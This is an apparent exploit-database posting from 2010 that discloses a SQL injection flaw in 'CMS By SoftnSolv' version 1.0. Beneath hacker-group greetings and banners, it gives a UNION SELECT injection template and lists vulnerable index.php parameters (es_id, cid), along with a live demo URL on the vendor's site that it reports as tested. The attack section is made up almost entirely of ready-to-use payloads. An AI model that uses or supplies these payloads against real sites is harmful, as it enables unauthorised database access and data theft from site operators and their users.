CMS By SoftnSolv (index.php) SQL Injection Vulnerability
Posted on 24 March 2010
======================================================== CMS By SoftnSolv (index.php) SQL Injection Vulnerability ======================================================== # Exploit Title: CMS By SoftnSolv (index.php) SQL Injection Vulnerable # Date: 24-03-2010 # Author: Th3 RDX # Software Link: # Version: 1.0 # Tested on: Demo Site # category: webapp # Code : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Sp3c1al Th4nkz to : R00T and R45C4L -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################## %// ----- [ Founder ] ----- Th3 RDX ----- [ E - mail ] ----- th3rdx@gmail.com %\ ############################################################################## ############################################################################## %// ----- [Title] ----- CMS By SoftnSolv (index.php) SQL Injection Vulnerable ----- [ Vendor ] ----- http://www.softnsolv.com/ %\ ############################################################################## ############################################################################## %// ----- [ Exploit (s) ] ----- Put [CODE] = SQL Injection Code {e.g = 45+and+1=0++Union+Select+UNHEX(HEX([visible])) ,2 (tables & column) } [SQLi] http://server/cms/index.php?es_id=44[CODE] [SQLi] http://server/cms/index.php?cid=45[CODE] [SQLi] http://server/cms/index.php?es_id=46[CODE] %\ ############################################################################## ############################################################################## %// >>>>>> TESTED ON <<<<<< ----- [ Live Link (s) ] ----- [Link] http://demo.softnsolv.com/cms_style2/index.php?id=45[CODE] %\ ############################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 24 March 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Inj3ct0r.com [2010-03-24]
